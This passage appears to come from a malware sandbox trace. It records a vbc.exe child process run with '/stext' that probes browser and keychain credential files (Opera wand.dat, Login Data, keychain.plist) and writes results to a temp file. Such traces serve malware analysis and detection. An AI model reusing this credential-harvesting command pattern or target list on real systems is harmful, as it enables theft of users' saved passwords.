(_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Chromium\\User Data") returned 0x36 [0069.350] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Chromium\\User Data\\*.*", lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 0xffffffff [0069.351] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x199074, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 1 [0069.351] wcslen (_String="Apple Computer\\Preferences\\keychain.plist") returned 0x29 [0069.351] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0069.351] wcscpy (in: _Dest=0x1996f8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming" [0069.351] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0069.351] wcscat (in: _Dest=0x1996f8, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\" [0069.351] wcscat (in: _Dest=0x1996f8, _Source="Apple Computer\\Preferences\\keychain.plist" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Apple Computer\\Preferences\\keychain.plist") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Apple Computer\\Preferences\\keychain.plist" [0069.351] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Apple Computer\\Preferences\\keychain.plist" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\apple computer\\preferences\\keychain.plist")) returned 0xffffffff [0069.351] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1992d8, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 1 [0069.351] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0069.351] wcslen (_String="Opera\\Opera\\wand.dat") returned 0x14 [0069.351] wcscpy (in: _Dest=0x1994e8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming" [0069.351] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0069.351] wcscat (in: _Dest=0x1994e8, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\" [0069.351] wcscat (in: _Dest=0x1994e8, _Source="Opera\\Opera\\wand.dat" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Opera\\Opera\\wand.dat") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Opera\\Opera\\wand.dat" [0069.351] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Opera\\Opera\\wand.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\opera\\opera\\wand.dat")) returned 0xffffffff [0069.351] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0069.351] wcslen (_String="Opera\\Opera7\\profile\\wand.dat") returned 0x1d [0069.351] wcscpy (in: _Dest=0x1994e8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming" [0069.351] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0069.351] wcscat (in: _Dest=0x1994e8, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\" [0069.351] wcscat (in: _Dest=0x1994e8, _Source="Opera\\Opera7\\profile\\wand.dat" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Opera\\Opera7\\profile\\wand.dat") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Opera\\Opera7\\profile\\wand.dat" [0069.351] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Opera\\Opera7\\profile\\wand.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\opera\\opera7\\profile\\wand.dat")) returned 0xffffffff [0069.351] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Opera\\*.*", lpFindFileData=0x199fb4 | out: lpFindFileData=0x199fb4) returned 0xffffffff [0069.351] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0069.351] wcslen (_String="Opera Software\\Opera Stable\\Login Data") returned 0x26 [0069.351] wcscpy (in: _Dest=0x1996f8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming" [0069.351] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0069.351] wcscat (in: _Dest=0x1996f8, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\" [0069.351] wcscat (in: _Dest=0x1996f8, _Source="Opera Software\\Opera Stable\\Login Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data" [0069.351] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\opera software\\opera stable\\login data")) returned 0xffffffff [0069.351] FreeLibrary (hLibModule=0x71590000) returned 1 [0069.379] FreeLibrary (hLibModule=0x74c60000) returned 1 [0069.380] _wcsicmp (_String1="/nosort", _String2="/stext") returned -5 [0069.380] _wcsicmp (_String1="/nosort", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp") returned -52 [0069.380] qsort (in: _Base=0x0, _NumOfElements=0x0, _SizeOfElements=0x1234, _PtFuncCompare=0x40e45b | out: _Base=0x0) [0069.380] SetCursor (hCursor=0x10007) returned 0x10007 [0069.380] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0069.380] WriteFile (in: hFile=0x210, lpBuffer=0x44af64*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19cd24, lpOverlapped=0x0 | out: lpBuffer=0x44af64*, lpNumberOfBytesWritten=0x19cd24*=0x2, lpOverlapped=0x0) returned 1 [0069.381] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0069.381] SetCursor (hCursor=0x10007) returned 0x10007 [0069.381] CloseHandle (hObject=0x210) returned 1 [0069.382] SetCursor (hCursor=0x10007) returned 0x10007 [0069.383] DeleteObject (ho=0x80a075d) returned 1 [0069.383] exit (_Code=0) Thread: id = 116 os_tid = 0xc34 Thread: id = 117 os_tid = 0xa74 Process: id = "5" image_name = "vbc.exe" filename = "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\vbc.exe" page_root = "0x51adf000" os_pid = "0xe1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xfcc" cmd_line = "\"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe\" /stext \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1216 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1217 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1218 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1219 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1220 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1221 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1222 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1223 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1224 start_va = 0x400000 end_va = 0x51efff entry_point = 0x400000 region_type = mapped_file name = "vbc.exe" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\vbc.exe") Region: id = 1225 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1226 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1227 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1228 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1229 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1230 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1231 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1232 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1233 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 1234 start_va = 0x400000 end_va = 0x41bfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1235 start_va = 0x230000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1236 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1237 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1238 start_va = 0x5b0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1239 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1240 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1241 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1242 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1243 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1244 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1245 start_va = 0x240000 end_va = 0x2fdfff entry_point = 0x240000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1246 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1247 start_va = 0x420000 end_va = 0x5a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1248 start_va = 0x6b0000 end_va = 0x830fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 1249 start_va = 0x8a0000 end_va = 0x8affff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 1250 start_va = 0x8b0000 end_va = 0x1caffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 1251 start_va = 0x1e20000 end_va = 0x1e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 1252 start_va = 0x71ad0000 end_va = 0x71b61fff entry_point = 0x71ad0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 1253 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1254 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1255 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1256 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1257 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1258 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1259 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1260 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1261 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 1262 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1263 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1264 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1265 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1266 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1267 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1268 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1269 start_va = 0x76f30000 end_va = 0x77019fff entry_point = 0x76f30000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1270 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1271 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1272 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1273 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1274 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1275 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1276 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1277 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1278 start_va = 0x1cb0000 end_va = 0x1daffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 1279 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1280 start_va = 0x1e30000 end_va = 0x2166fff entry_point = 0x1e30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1281 start_va = 0x73110000 end_va = 0x73117fff entry_point = 0x73110000 region_type = mapped_file name = "pstorec.dll" filename = "\\Windows\\SysWOW64\\pstorec.dll" (normalized: "c:\\windows\\syswow64\\pstorec.dll") Region: id = 1282 start_va = 0x76680000 end_va = 0x767f4fff entry_point = 0x76680000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1283 start_va = 0x771c0000 end_va = 0x771cdfff entry_point = 0x771c0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1284 start_va = 0x76680000 end_va = 0x767f4fff entry_point = 0x76680000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1285 start_va = 0x771c0000 end_va = 0x771cdfff entry_point = 0x771c0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Thread: id = 120 os_tid = 0x190 [0138.232] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0138.232] __set_app_type (_Type=0x2) [0138.232] __p__fmode () returned 0x77984d6c [0138.232] __p__commode () returned 0x77985b1c [0138.233] __getmainargs (in: _Argc=0x19ff54, _Argv=0x19ff58, _Env=0x19ff5c, _DoWildCard=0, _StartInfo=0x19ff60 | out: _Argc=0x19ff54, _Argv=0x19ff58, _Env=0x19ff5c) returned 0 [0138.233] _onexit (_Func=0x4123d0) returned 0x4123d0 [0138.233] _onexit (_Func=0x4123e1) returned 0x4123e1 [0138.233] _onexit (_Func=0x4123f2) returned 0x4123f2 [0138.233] _onexit (_Func=0x412433) returned 0x412433 [0138.233] GetStartupInfoA (in: lpStartupInfo=0x19ff08 | out: lpStartupInfo=0x19ff08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0138.233] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0138.233] LoadLibraryA (lpLibFileName="comctl32.dll") returned 0x71ad0000 [0138.233] GetProcAddress (hModule=0x71ad0000, lpProcName="InitCommonControlsEx") returned 0x71ad5000 [0138.233] InitCommonControlsEx (picce=0x19fae8) returned 1 [0138.234] FreeLibrary (hLibModule=0x71ad0000) returned 1 [0138.234] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x752c0000 [0138.235] GetProcAddress (hModule=0x752c0000, lpProcName="SHGetSpecialFolderPathA") returned 0x75564f00 [0138.235] _mbscpy (in: param_1=0x8a2c93, param_2=0x413fc4 | out: param_1=0x8a2c93) returned 0x8a2c93 [0138.235] _mbscpy (in: param_1=0x8a2ed7, param_2=0x413fc4 | out: param_1=0x8a2ed7) returned 0x8a2ed7 [0138.235] _mbscpy (in: param_1=0x19f9bc, param_2=0x414488 | out: param_1=0x19f9bc) returned 0x19f9bc [0138.235] CreateFontIndirectA (lplf=0x19f9a0) returned 0x750a06d6 [0138.235] strncat (in: _Dest="", _Source="Nðú\x19", _Count=0x1 | out: _Dest="N") returned="N" [0138.235] strncat (in: _Dest="N", _Source="iðú\x19", _Count=0x1 | out: _Dest="Ni") returned="Ni" [0138.235] strncat (in: _Dest="Ni", _Source="rðú\x19", _Count=0x1 | out: _Dest="Nir") returned="Nir" [0138.235] strncat (in: _Dest="Nir", _Source="Sðú\x19", _Count=0x1 | out: _Dest="NirS") returned="NirS" [0138.235] strncat (in: _Dest="NirS", _Source="oðú\x19", _Count=0x1 | out: _Dest="NirSo") returned="NirSo" [0138.236] strncat (in: _Dest="NirSo", _Source="fðú\x19", _Count=0x1 | out: _Dest="NirSof") returned="NirSof" [0138.236] strncat (in: _Dest="NirSof", _Source="tðú\x19", _Count=0x1 | out: _Dest="NirSoft") returned="NirSoft" [0138.236] strncat (in: _Dest="NirSoft", _Source=" ðú\x19", _Count=0x1 | out: _Dest="NirSoft ") returned="NirSoft " [0138.236] strncat (in: _Dest="NirSoft ", _Source="Fðú\x19", _Count=0x1 | out: _Dest="NirSoft F") returned="NirSoft F" [0138.236] strncat (in: _Dest="NirSoft F", _Source="rðú\x19", _Count=0x1 | out: _Dest="NirSoft Fr") returned="NirSoft Fr" [0138.236] strncat (in: _Dest="NirSoft Fr", _Source="eðú\x19", _Count=0x1 | out: _Dest="NirSoft Fre") returned="NirSoft Fre" [0138.236] strncat (in: _Dest="NirSoft Fre", _Source="eðú\x19", _Count=0x1 | out: _Dest="NirSoft Free") returned="NirSoft Free" [0138.236] strncat (in: _Dest="NirSoft Free", _Source="wðú\x19", _Count=0x1 | out: _Dest="NirSoft Freew") returned="NirSoft Freew" [0138.236] strncat (in: _Dest="NirSoft Freew", _Source="aðú\x19", _Count=0x1 | out: _Dest="NirSoft Freewa") returned="NirSoft Freewa" [0138.236] strncat (in: _Dest="NirSoft Freewa", _Source="rðú\x19", _Count=0x1 | out: _Dest="NirSoft Freewar") returned="NirSoft Freewar" [0138.236] strncat (in: _Dest="NirSoft Freewar", _Source="eðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware") returned="NirSoft Freeware" [0138.236] strncat (in: _Dest="NirSoft Freeware", _Source=".ðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware.") returned="NirSoft Freeware." [0138.236] strncat (in: _Dest="NirSoft Freeware.", _Source=" ðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. ") returned="NirSoft Freeware. " [0138.236] strncat (in: _Dest="NirSoft Freeware. ", _Source=" ðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. ") returned="NirSoft Freeware. " [0138.236] strncat (in: _Dest="NirSoft Freeware. ", _Source="hðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. h") returned="NirSoft Freeware. h" [0138.236] strncat (in: _Dest="NirSoft Freeware. h", _Source="tðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. ht") returned="NirSoft Freeware. ht" [0138.236] strncat (in: _Dest="NirSoft Freeware. ht", _Source="tðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. htt") returned="NirSoft Freeware. htt" [0138.236] strncat (in: _Dest="NirSoft Freeware. htt", _Source="pðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http") returned="NirSoft Freeware. http" [0138.236] strncat (in: _Dest="NirSoft Freeware. http", _Source=":ðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http:") returned="NirSoft Freeware. http:" [0138.236] strncat (in: _Dest="NirSoft Freeware. http:", _Source="/ðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http:/") returned="NirSoft Freeware. http:/" [0138.236] strncat (in: _Dest="NirSoft Freeware. http:/", _Source="/ðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://") returned="NirSoft Freeware. http://" [0138.236] strncat (in: _Dest="NirSoft Freeware. http://", _Source="wðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://w") returned="NirSoft Freeware. http://w" [0138.236] strncat (in: _Dest="NirSoft Freeware. http://w", _Source="wðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://ww") returned="NirSoft Freeware. http://ww" [0138.236] strncat (in: _Dest="NirSoft Freeware. http://ww", _Source="wðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www") 